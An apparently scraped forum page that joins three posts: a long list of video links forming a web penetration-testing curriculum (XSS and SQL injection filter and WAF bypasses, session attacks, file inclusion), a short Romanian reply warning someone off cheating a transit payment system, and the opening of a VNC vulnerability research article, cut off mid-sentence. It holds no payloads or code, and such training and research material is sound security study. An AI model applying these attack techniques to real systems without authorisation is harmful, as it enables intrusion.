https://www.youtube.com/watch?v=B_Mu7jmOYnU&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=12 ÆTHER SECURITY LAB 38. No.1 Penetration testing tool - https://www.youtube.com/watch?v=AVzC7ETqpDo&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=1 39. Environment Setup - https://www.youtube.com/watch?v=yqnUOdr0eVk&index=2&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA 40. General concept - https://www.youtube.com/watch?v=udl4oqr_ylM&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=3 41. Proxy module - https://www.youtube.com/watch?v=PDTwYFkjQBE&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=4 42. Repeater module - https://www.youtube.com/watch?v=9Zh_7s5csCc&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=5 43. Target and spider module - https://www.youtube.com/watch?v=dCKPZUSOlr8&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=6 44. Sequencer and scanner module - https://www.youtube.com/watch?v=G-v581pXerE&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=7 Phase 4 – Mapping the application and attack surface 45. Spidering - https://www.youtube.com/watch?v=97uMUQGIe14&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=5 46. Mapping application using robots.txt - https://www.youtube.com/watch?v=akuzgZ75zrk 47. Discover hidden contents using dirbuster - https://www.youtube.com/watch?v=--nu9Jq07gA 48. Dirbuster in detail - https://www.youtube.com/watch?v=2tOQC68hAcQ 49. Discover hidden directories and files with intruder - https://www.youtube.com/watch?v=4Fz9mJeMNkI 50. Directory bruteforcing 1 - https://www.youtube.com/watch?v=ch2onB_LFoI 51. Directory bruteforcing 2 - https://www.youtube.com/watch?v=ASMW_oLbyIg 52. Identify application entry points - https://www.youtube.com/watch?v=IgJWPZ2OKO8&t=34s 53. Identify application entry points - https://www.owasp.org/index.php/Identify_application_entry_points_(OTG-INFO-006) 54. Identify client and server technology - https://www.youtube.com/watch?v=B8jN_iWjtyM 55. Identify server technology using banner grabbing (telnet) - https://www.youtube.com/watch?v=O67M-U2UOAg 56. Identify server technology using httprecon - https://www.youtube.com/watch?v=xBBHtS-dwsM 57. Pentesting with Google dorks Introduction - https://www.youtube.com/watch?v=NmdrKFwAw9U 58. Fingerprinting web server - https://www.youtube.com/watch?v=tw2VdG0t5kc&list=PLxLRoXCDIalcRS5Nb1I_HM_OzS10E6lqp&index=10 59. Use Nmap for fingerprinting web server - https://www.youtube.com/watch?v=VQV-y_-AN80 60. Review webs servers metafiles for information leakage - https://www.youtube.com/watch?v=sds3Zotf_ZY 61. Enumerate applications on web server - https://www.youtube.com/watch?v=lfhvvTLN60E 62. Identify application entry points - https://www.youtube.com/watch?v=97uMUQGIe14&list=PLDeogY2Qr-tGR2NL2X1AR5Zz9t1iaWwlM 63. Map execution path through application - https://www.youtube.com/watch?v=0I0NPiyo9UI 64. Fingerprint web application frameworks - https://www.youtube.com/watch?v=ASzG0kBoE4c Phase 5 – Understanding and exploiting OWASP top 10 vulnerabilities 65. A closer look at all owasp top 10 vulnerabilities - https://www.youtube.com/watch?v=avFR_Af0KGk IBM 66. Injection - https://www.youtube.com/watch?v=02mLrFVzIYU&index=1&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d 67. Broken authentication and session management - https://www.youtube.com/watch?v=iX49fqZ8HGA&index=2&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d 68. Cross-site scripting - https://www.youtube.com/watch?v=x6I5fCupLLU&index=3&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d 69. Insecure direct object reference - https://www.youtube.com/watch?v=-iCyp9Qz3CI&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d&index=4 70. Security misconfiguration - https://www.youtube.com/watch?v=cIplXL8idyo&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d&index=5 71. Sensitive data exposure - https://www.youtube.com/watch?v=rYlzTQlF8Ws&index=6&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d 72. Missing functional level access controls - https://www.youtube.com/watch?v=VMv_gyCNGpk&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d&index=7 73. Cross-site request forgery - https://www.youtube.com/watch?v=_xSFm3KGxh0&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d&index=8 74. Using components with known vulnerabilities - https://www.youtube.com/watch?v=bhJmVBJ-F-4&index=9&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d 75. Unvalidated redirects and forwards - https://www.youtube.com/watch?v=L6bYKiLtSL8&index=10&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d F5 CENTRAL 76. Injection - https://www.youtube.com/watch?v=rWHvp7rUka8&index=1&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 77. Broken authentication and session management - https://www.youtube.com/watch?v=mruO75ONWy8&index=2&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 78. Insecure deserialisation - https://www.youtube.com/watch?v=nkTBwbnfesQ&index=8&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 79. Sensitive data exposure - https://www.youtube.com/watch?v=2RKbacrkUBU&index=3&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 80. Broken access control - https://www.youtube.com/watch?v=P38at6Tp8Ms&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD&index=5 81. Insufficient logging and monitoring - https://www.youtube.com/watch?v=IFF3tkUOF5E&index=10&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 82. XML external entities - https://www.youtube.com/watch?v=g2ey7ry8_CQ&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD&index=4 83. Using components with known vulnerabilities - https://www.youtube.com/watch?v=IGsNYVDKRV0&index=9&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 84. Cross-site scripting - https://www.youtube.com/watch?v=IuzU4y-UjLw&index=7&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 85. Security misconfiguration - https://www.youtube.com/watch?v=JuGSUMtKTPU&index=6&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD LUKE BRINER 86. Injection explained - https://www.youtube.com/watch?v=1qMggPJpRXM&index=1&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X 87. Broken authentication and session management - https://www.youtube.com/watch?v=fKnG15BL4AY&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=2 88. Cross-site scripting - https://www.youtube.com/watch?v=ksM-xXeDUNs&index=3&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X 89. Insecure direct object reference - https://www.youtube.com/watch?v=ZodA76-CB10&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=4 90. Security misconfiguration - https://www.youtube.com/watch?v=DfFPHKPCofY&index=5&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X 91. Sensitive data exposure - https://www.youtube.com/watch?v=Z7hafbGDVEE&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=6 92. Missing functional level access control - https://www.youtube.com/watch?v=RGN3w831Elo&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=7 93. Cross-site request forgery - https://www.youtube.com/watch?v=XRW_US5BCxk&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=8 94. Components with known vulnerabilities - https://www.youtube.com/watch?v=pbvDW9pJdng&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=9 95. Unvalidated redirects and forwards - https://www.youtube.com/watch?v=bHTglpgC5Qg&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=10 Phase 6 – Session management testing 96. Bypass authentication using cookie manipulation - https://www.youtube.com/watch?v=mEbmturLljU 97. Cookie Security Via httponly and secure Flag - OWASP - https://www.youtube.com/watch?v=3aKA4RkAg78 98. Penetration testing Cookies basic - https://www.youtube.com/watch?v=_P7KN8T1boc 99. Session fixation 1 - https://www.youtube.com/watch?v=ucmgeHKtxaI 100. Session fixation 2 - https://www.youtube.com/watch?v=0Tu1qxysWOk 101. Session fixation 3 - https://www.youtube.com/watch?v=jxwgpWvRUSo 102. Session fixation 4 - https://www.youtube.com/watch?v=eUbtW0Z0W1g 103. CSRF - Cross site request forgery 1 - https://www.youtube.com/watch?v=m0EHlfTgGUU 104. CSRF - Cross site request forgery 2 - https://www.youtube.com/watch?v=H3iu0_ltcv4 105. CSRF - Cross site request forgery 3 - https://www.youtube.com/watch?v=1NO4I28J-0s 106. CSRF - Cross site request forgery 4 - https://www.youtube.com/watch?v=XdEJEUJ0Fr8 107. CSRF - Cross site request forgery 5 - https://www.youtube.com/watch?v=TwG0Rd0hr18 108. Session puzzling 1 - https://www.youtube.com/watch?v=YEOvmhTb8xA 109. Admin bypass using session hijacking - https://www.youtube.com/watch?v=1wp1o-1TfAc Phase 7 – Bypassing client-side controls 110. What is hidden forms in HTML - https://www.youtube.com/watch?v=orUoGsgaYAE 111. Bypassing hidden form fields using tamper data - https://www.youtube.com/watch?v=NXkGX2sPw7I 112. Bypassing hidden form fields using Burp Suite (Purchase application) - https://www.youtube.com/watch?v=xahvJyUFTfM 113. Changing price on eCommerce website using parameter tampering - https://www.youtube.com/watch?v=A-ccNpP06Zg 114. Understanding cookie in detail - https://www.youtube.com/watch?v=_P7KN8T1boc&list=PLWPirh4EWFpESKWJmrgQwmsnTrL_K93Wi&index=18 115. Cookie tampering with tamper data- https://www.youtube.com/watch?v=NgKXm0lBecc 116. Cookie tamper part 2 - https://www.youtube.com/watch?v=dTCt_I2DWgo 117. Understanding referer header in depth using Cisco product - https://www.youtube.com/watch?v=GkQnBa3C7WI&t=35s 118. Introduction to ASP.NET viewstate - https://www.youtube.com/watch?v=L3p6Uw6SSXs 119. ASP.NET viewstate in depth - https://www.youtube.com/watch?v=Fn_08JLsrmY 120. Analyse sensitive data in ASP.NET viewstate - https://msdn.microsoft.com/en-us/library/ms972427.aspx?f=255&MSPPError=-2147217396 121. Cross-origin-resource-sharing explanation with example - https://www.youtube.com/watch?v=Ka8vG5miErk 122. CORS demo 1 - https://www.youtube.com/watch?v=wR8pjTWaEbs 123. CORS demo 2 - https://www.youtube.com/watch?v=lg31RYYG-T4 124. Security headers - https://www.youtube.com/watch?v=TNlcoYLIGFk 125. Security headers 2 - https://www.youtube.com/watch?v=ZZUvmVkkKu4 Phase 8 – Attacking authentication/login 126. Attacking login panel with bad password - Guess username password for the website and try different combinations 127. Brute-force login panel - https://www.youtube.com/watch?v=25cazx5D_vw 128. Username enumeration - https://www.youtube.com/watch?v=WCO7LnSlskE 129. Username enumeration with bruteforce password attack - https://www.youtube.com/watch?v=zf3-pYJU1c4 130. Authentication over insecure HTTP protocol - https://www.youtube.com/watch?v=ueSG7TUqoxk 131. Authentication over insecure HTTP protocol - https://www.youtube.com/watch?v=_WQe36pZ3mA 132. Forgot password vulnerability - case 1 - https://www.youtube.com/watch?v=FEUidWWnZwU 133. Forgot password vulnerability - case 2 - https://www.youtube.com/watch?v=j7-8YyYdWL4 134. Login page autocomplete feature enabled - https://www.youtube.com/watch?v=XNjUfwDmHGc&t=33s 135. Testing for weak password policy - https://www.owasp.org/index.php/Testing_for_Weak_password_policy_(OTG-AUTHN-007) 136. Insecure distribution of credentials - When you register in any website or you request for a password reset using forgot password feature, if the website sends your username and password over the email in cleartext without sending the password reset link, then it is a vulnerability. 137. Test for credentials transportation using SSL/TLS certificate - https://www.youtube.com/watch?v=21_IYz4npRs 138. Basics of MySQL - https://www.youtube.com/watch?v=yPu6qV5byu4 139. Testing browser cache - https://www.youtube.com/watch?v=2T_Xz3Humdc 140. Bypassing login panel -case 1 - https://www.youtube.com/watch?v=TSqXkkOt6oM 141. Bypass login panel - case 2 - https://www.youtube.com/watch?v=J6v_W-LFK1c Phase 9 - Attacking access controls (IDOR, Priv esc, hidden files and directories) Completely unprotected functionalities 142. Finding admin panel - https://www.youtube.com/watch?v=r1k2lgvK3s0 143. Finding admin panel and hidden files and directories - https://www.youtube.com/watch?v=Z0VAPbATy1A 144. Finding hidden webpages with dirbusater - https://www.youtube.com/watch?v=--nu9Jq07gA&t=5s Insecure direct object reference 145. IDOR case 1 - https://www.youtube.com/watch?v=gci4R9Vkulc 146. IDOR case 2 - https://www.youtube.com/watch?v=4DTULwuLFS0 147. IDOR case 3 (zomato) - https://www.youtube.com/watch?v=tCJBLG5Mayo Privilege escalation 148. What is privilege escalation - https://www.youtube.com/watch?v=80RzLSrczmc 149. Privilege escalation - Hackme bank - case 1 - https://www.youtube.com/watch?v=g3lv__87cWM 150. Privilege escalation - case 2 - https://www.youtube.com/watch?v=-i4O_hjc87Y Phase 10 – Attacking Input validations (All injections, XSS and mics) HTTP verb tampering 151. Introduction HTTP verb tampering - https://www.youtube.com/watch?v=Wl0PrIeAnhs 152. HTTP verb tampering demo - https://www.youtube.com/watch?v=bZlkuiUkQzE HTTP parameter pollution 153. Introduction HTTP parameter pollution - https://www.youtube.com/watch?v=Tosp-JyWVS4 154. HTTP parameter pollution demo 1 - https://www.youtube.com/watch?v=QVZBl8yxVX0&t=11s 155. HTTP parameter pollution demo 2 - https://www.youtube.com/watch?v=YRjxdw5BAM0 156. HTTP parameter pollution demo 3 - https://www.youtube.com/watch?v=kIVefiDrWUw XSS - Cross site scripting 157. Introduction to XSS - https://www.youtube.com/watch?v=gkMl1suyj3M 158. What is XSS - https://www.youtube.com/watch?v=cbmBDiR6WaY 159. Reflected XSS demo - https://www.youtube.com/watch?v=r79ozjCL7DA 160. XSS attack method using burpsuite - https://www.youtube.com/watch?v=OLKBZNw3OjQ 161. XSS filter bypass with Xenotix - https://www.youtube.com/watch?v=loZSdedJnqc 162. Reflected XSS filter bypass 1 - https://www.youtube.com/watch?v=m5rlLgGrOVA 163. Reflected XSS filter bypass 2 - https://www.youtube.com/watch?v=LDiXveqQ0gg 164. Reflected XSS filter bypass 3 - https://www.youtube.com/watch?v=hb_qENFUdOk 165. Reflected XSS filter bypass 4 - https://www.youtube.com/watch?v=Fg1qqkedGUk 166. Reflected XSS filter bypass 5 - https://www.youtube.com/watch?v=NImym71f3Bc 167. Reflected XSS filter bypass 6 - https://www.youtube.com/watch?v=9eGzAym2a5Q 168. Reflected XSS filter bypass 7 - https://www.youtube.com/watch?v=ObfEI84_MtM 169. Reflected XSS filter bypass 8 - https://www.youtube.com/watch?v=2c9xMe3VZ9Q 170. Reflected XSS filter bypass 9 - https://www.youtube.com/watch?v=-48zknvo7LM 171. Introduction to Stored XSS - https://www.youtube.com/watch?v=SHmQ3sQFeLE 172. Stored XSS 1 - https://www.youtube.com/watch?v=oHIl_pCahsQ 173. Stored XSS 2 - https://www.youtube.com/watch?v=dBTuWzX8hd0 174. Stored XSS 3 - https://www.youtube.com/watch?v=PFG0lkMeYDc 175. Stored XSS 4 - https://www.youtube.com/watch?v=YPUBFklUWLc 176. Stored XSS 5 - https://www.youtube.com/watch?v=x9Zx44EV-Og SQL injection 177. Part 1 - Install SQLi lab - https://www.youtube.com/watch?v=NJ9AA1_t1Ic&index=23&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 178. Part 2 - SQL lab series - https://www.youtube.com/watch?v=TA2h_kUqfhU&index=22&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 179. Part 3 - SQL lab series - https://www.youtube.com/watch?v=N0zAChmZIZU&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=21 180. Part 4 - SQL lab series - https://www.youtube.com/watch?v=6pVxm5mWBVU&index=20&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 181. Part 5 - SQL lab series - https://www.youtube.com/watch?v=0tyerVP9R98&index=19&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 182. Part 6 - Double query injection - https://www.youtube.com/watch?v=zaRlcPbfX4M&index=18&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 183. Part 7 - Double query injection cont.. - https://www.youtube.com/watch?v=9utdAPxmvaI&index=17&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 184. Part 8 - Blind injection boolean based - https://www.youtube.com/watch?v=u7Z7AIR6cMI&index=16&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 185. Part 9 - Blind injection time based - https://www.youtube.com/watch?v=gzU1YBu_838&index=15&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 186. Part 10 - Dumping DB using outfile - https://www.youtube.com/watch?v=ADW844OA6io&index=14&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 187. Part 11 - Post parameter injection error based - https://www.youtube.com/watch?v=6sQ23tqiTXY&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=13 188. Part 12 - POST parameter injection double query based - https://www.youtube.com/watch?v=tjFXWQY4LuA&index=12&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 189. Part 13 - POST parameter injection blind boolean and time based - https://www.youtube.com/watch?v=411G-4nH5jE&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=10 190. Part 14 - Post parameter injection in UPDATE query - https://www.youtube.com/watch?v=2FgLcPuU7Vw&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=11 191. Part 15 - Injection in insert query - https://www.youtube.com/watch?v=ZJiPsWxXYZs&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=9 192. Part 16 - Cookie based injection - https://www.youtube.com/watch?v=-A3vVqfP8pA&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=8 193. Part 17 - Second order injection -https://www.youtube.com/watch?v=e9pbC5BxiAE&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=7 194. Part 18 - Bypassing blacklist filters - 1 - https://www.youtube.com/watch?v=5P-knuYoDdw&index=6&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 195. Part 19 - Bypassing blacklist filters - 2 - https://www.youtube.com/watch?v=45BjuQFt55Y&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=5 196. Part 20 - Bypassing blacklist filters - 3 - https://www.youtube.com/watch?v=c-Pjb_zLpH0&index=4&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 197. Part 21 - Bypassing WAF - https://www.youtube.com/watch?v=uRDuCXFpHXc&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=2 198. Part 22 - Bypassing WAF - Impedance mismatch - https://www.youtube.com/watch?v=ygVUebdv_Ws&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=3 199. Part 23 - Bypassing addslashes - charset mismatch - https://www.youtube.com/watch?v=du-jkS6-sbo&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=1 NoSQL injection 200. Introduction to NoSQL injection - https://www.youtube.com/watch?v=h0h37-Dwd_A 201. Introduction to SQL vs NoSQL - Difference between MySQL and MongoDB with tutorial - https://www.youtube.com/watch?v=QwevGzVu_zk 202. Abusing NoSQL databases - https://www.youtube.com/watch?v=lcO1BTNh8r8 203. Making cry - attacking NoSQL for pentesters - https://www.youtube.com/watch?v=NgsesuLpyOg Xpath and XML injection 204. Introduction to Xpath injection - https://www.youtube.com/watch?v=2_UyM6Ea0Yk&t=3102s 205. Introduction to XML injection - https://www.youtube.com/watch?v=9ZokuRHo-eY 206. Practical 1 - bWAPP - https://www.youtube.com/watch?v=6tV8EuaHI9M 207. Practical 2 - Mutillidae - https://www.youtube.com/watch?v=fV0qsqcScI4 208. Practical 3 - webgoat - https://www.youtube.com/watch?v=5ZDSPVp1TpM 209. Hack admin panel using Xpath injection - https://www.youtube.com/watch?v=vvlyYlXuVxI 210. XXE demo - https://www.youtube.com/watch?v=3B8QhyrEXlU 211. XXE demo 2 - https://www.youtube.com/watch?v=UQjxvEwyUUw 212. XXE demo 3 - https://www.youtube.com/watch?v=JI0daBHq6fA LDAP injection 213. Introduction and practical 1 - https://www.youtube.com/watch?v=-TXFlg7S9ks 214. Practical 2 - https://www.youtube.com/watch?v=wtahzm_R8e4 OS command injection 215. OS command injection in bWAPP - https://www.youtube.com/watch?v=qLIkGJrMY9k 216. bWAAP- OS command injection with Commiux (All levels) - https://www.youtube.com/watch?v=5-1QLbVa8YE Local file inclusion 217. Detailed introduction - https://www.youtube.com/watch?v=kcojXEwolIs 218. LFI demo 1 - https://www.youtube.com/watch?v=54hSHpVoz7A 219. LFI demo 2 - https://www.youtube.com/watch?v=qPq9hIVtitI Remote file inclusion 220. Detailed introduction - https://www.youtube.com/watch?v=MZjORTEwpaw 221. RFI demo 1 - https://www.youtube.com/watch?v=gWt9A6eOkq0 222. RFI introduction and demo 2 - https://www.youtube.com/watch?v=htTEfokaKsM HTTP splitting/smuggling 223. Detailed introduction - https://www.youtube.com/watch?v=bVaZWHrfiPw 224. Demo 1 - https://www.youtube.com/watch?v=mOf4H1aLiiE Phase 11 – Generating and testing error codes 225. Generating normal error codes by visiting files that may not exist on the server - for example visit chintan.php or chintan.aspx file on any website and it may redirect you to 404.php or 404.aspx or their customer error page. Check if an error page is generated by default web server or application framework or a custom page is displayed which does not display any sensitive information. 226. Use BurpSuite fuzzing techniques to generate stack trace error codes - https://www.youtube.com/watch?v=LDF6OkcvBzM Phase 12 – Weak cryptography testing 227. SSL/TLS weak configuration explained - https://www.youtube.com/watch?v=Rp3iZUvXWlM 228. Testing weak SSL/TLS ciphers - https://www.youtube.com/watch?v=slbwCMHqCkc 229. Test SSL/TLS security with Qualys guard - https://www.youtube.com/watch?v=Na8KxqmETnw 230. Sensitive information sent via unencrypted channels - https://www.youtube.com/watch?v=21_IYz4npRs Phase 12 – Business logic vulnerability 231. What is a business logic flaw - https://www.youtube.com/watch?v=ICbvQzva6lE&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI 232. The Difficulties Finding Business Logic Vulnerabilities with Traditional Security Tools - https://www.youtube.com/watch?v=JTMg0bhkUbo&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=2 233. How To Identify Business Logic Flaws - https://www.youtube.com/watch?v=FJcgfLM4SAY&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=3 234. Business Logic Flaws: Attacker Mindset - https://www.youtube.com/watch?v=Svxh9KSTL3Y&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=4 235. Business Logic Flaws: Dos Attack On Resource - https://www.youtube.com/watch?v=4S6HWzhmXQk&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=5 236. Business Logic Flaws: Abuse Cases: Information Disclosure - https://www.youtube.com/watch?v=HrHdUEUwMHk&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=6 237. Business Logic Flaws: Abuse Cases: iPod Repairman Dupes Apple - https://www.youtube.com/watch?v=8yB_ApVsdhA&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=7 238. Business Logic Flaws: Abuse Cases: Online Auction - https://www.youtube.com/watch?v=oa_UICCqfbY&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=8 239. Business Logic Flaws: How To Navigate Code Using ShiftLeft Ocular - https://www.youtube.com/watch?v=hz7IZu6H6oE&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=9 240. Business Logic Security Checks: Data Privacy Compliance - https://www.youtube.com/watch?v=qX2fyniKUIQ&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=10 241. Business Logic Security Checks: Encryption Compliance - https://www.youtube.com/watch?v=V8zphJbltDY&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=11 242. Business Logic Security: Enforcement Checks - https://www.youtube.com/watch?v=5e7qgY_L3UQ&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=12 243. Business Logic Exploits: SQL Injection - https://www.youtube.com/watch?v=hcIysfhA9AA&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=13 244. Business Logic Exploits: Security Misconfiguration - https://www.youtube.com/watch?v=ppLBtCQcYRk&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=15 245. Business Logic Exploits: Data Leakage - https://www.youtube.com/watch?v=qe0bEvguvbs&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=16 246. Demo 1 - https://www.youtube.com/watch?v=yV7O-QRyOao 247. Demo 2 - https://www.youtube.com/watch?v=mzjTG7pKmQI 248. Demo 3 - https://www.youtube.com/watch?v=A8V_58QZPMs 249. Demo 4 - https://www.youtube.com/watch?v=1pvrEKAFJyk 250. Demo 5 - https://hackerone.com/reports/145745 251. Demo 6 - https://hackerone.com/reports/430854 Sursa: https://drive.google.com/file/d/11TajgAcem-XI5H8Pu8Aa2GiUofyM0oQm/view
  16. Nu poti sa ii arati acele poze si gata? Totusi, orice ai face, probabil daca se prinde si anunta controlorii/politia e nasol ma gandesc.
  17. Salut, nu cred ca am inteles exact ce vrei sa faci de fapt. Din punctul meu de vedere, daca incerci sa pacalesti acel sistem de plati e foarte probabil sa ai probleme mai mari decat 240$ pe luna. Sunt destul de sigur ca exista un mecanism de validare a calatoriilor care poate fi dificil de pacalit. Chiar si la noi in RO e dificil de pacalit RATB/STB.
  18. VNC vulnerability research Download PDF version 22 November 2019 Preparing for the research System description Possible attack vectors Objects of research Prior research Research findings LibVNC TightVNC TurboVNC UltraVNC CVE-2018-15361 CVE-2019-8262 Conclusion In this article, we discuss the findings of research which covered several different implementations of a remote access system called Virtual Network Computing (VNC). As a result of this research, we identified a number of memory corruption vulnerabilities, which have been assigned a total of 37 CVE identifiers. Some of the vulnerabilities identified, if exploited, could lead to remote code execution. Preparing for the research The VNC system is designed to provide one device with remote access to another device’s screen. It is worth noting that the protocol’s specification does not limit the choice of OS and allows cross-platform implementations. There are implementations both for common operating systems – GNU/Linux, Windows, Android – and for exotic ones. VNC has become one of the most widespread systems of its kind, thanks in part to cross-platform implementations and open-source licenses. The exact number of installations is hard to estimate. Based on data from shodan.io, over 600,000 VNC servers are available online. If you add those devices which are only available on the local network, it can be confidently assumed that the total number of VNC servers in use is many times (perhaps by orders of magnitude) greater. According to our data, VNC is actively used in industrial automation systems. We have recently published an article on the use of remote administration tools in industrial control systems on our website. It is estimated in the article that various remote administration tools (RAT), including VNC, are installed on about 32% of industrial control system computers. In 18.6% of all cases, RATs are included in ICS software distribution packages and are installed with that software. The remaining 81.4% were apparently installed by honest or not-so-honest employees of these enterprises or their contractors. In an article published on our website, we described attacks we had analyzed, in which the attackers had installed and used remote administration tools. Importantly, in some cases the attackers exploited vulnerabilities in remote administration tools as part of their attack scenarios. According to our estimates, most ICS vendors implement remote administration tools for their products based on VNC rather than any other system. This made an analysis of VNC security a high-priority task for us. In 2019, the BlueKeep vulnerability (CVE-2019-0708) in Windows RDP (Remote Desktop Services) triggered an emotional public response. The vulnerability enabled an unauthorized attacker to achieve remote code execution with SYSTEM privileges on a Windows machine on which the RDP server was running. It affected ‘junior’ versions of the operating system, such as Windows 7 SP1 and Windows 2008 Server SP1 and SP2. Some VNC server components in Windows are implemented as services that provide privileged access to the system, which means they themselves also have high-level access to the system. This is one more reason for prioritizing research on the security of VNC. System description VNC (Virtual Network Computing) is a system designed to provide remote access to the operating system’s user interface (desktop). VNC uses the RFB (remote frame buffer) protocol to transfer screen images, mouse movement and keypress events between devices. As a rule, each implementation of the system includes a server component and a client component. Since the RFB protocol is standardized, different implementations of the client and server parts are interchangeable. The server component sends the image of the server’s desktop to the client for viewing and the client in turn transmits client-side events (such as mouse cursor movements, keypresses, data copying and pasting via the cut buffer) back to the server. This enables the user on the client side to work on the remote machine where the VNC server is running. The VNC server sends an image every time the remote machine’s desktop is updated, which can occur, among other things, as a result of the client’s actions. Sending a new complete screenshot over the network is obviously a relatively resource-intensive operation, so instead of sending the entire screenshot the protocol updates those pixels which have changed as a result of some actions or events. RFB also supports several screen update compression and encoding methods. For example, compression can be performed using zlib or RLE (run-length encoding). Although the software is designed to perform a simple task, it has sufficiently extensive functionality for programmers to make mistakes at the development stage. Possible attack vectors Since the VNC system consists of server and client components, below we look at two main attack vectors: An attacker is on the same network with the VNC server and attacks it to gain the ability to execute code on the server with the server’s privileges. A user connects to an attacker’s ‘server’ using a VNC client and the attacker exploits vulnerabilities in the client to attack the user and execute code on the user’s machine. Attackers would without doubt prefer remote code execution on the server. However, most vulnerabilities are found in the system’s client component. In part, this is because the client component includes code designed to decode data sent by the server in all sorts of formats. It is while writing data decoding components that developers often make errors resulting in memory corruption vulnerabilities. The server part, on the other hand, can have a relatively small codebase, designed to send encoded screen updates to the user and handle events received from the client side. According to the specification, the server must support only six message types to provide all the functions required for its operation. This means that most server components have almost no complicated functionality, reducing the chances of a developer making an error. However, various extensions are implemented in some systems to augment the server’s functionality, such as file transfer, chat between the client and the server, and many others. As our research demonstrated, it is in the code designed to augment the server’s functionality that the majority of errors were made. Objects of research We selected the most common VNC implementations for our research: LibVNC – an open-source cross-platform library for creating a custom application based on the RFB protocol. The server component of LibVNC is used, for example, in VirtualBox to provide access to the virtual machine via VNC. UltraVNC – a popular open-source VNC implementation developed specifically for Windows. Recommended by many industrial automation companies for connecting to remote HMI interfaces over the RFB protocol (see, for example, here and here). TightVNCX – one more popular implementation of the RFB 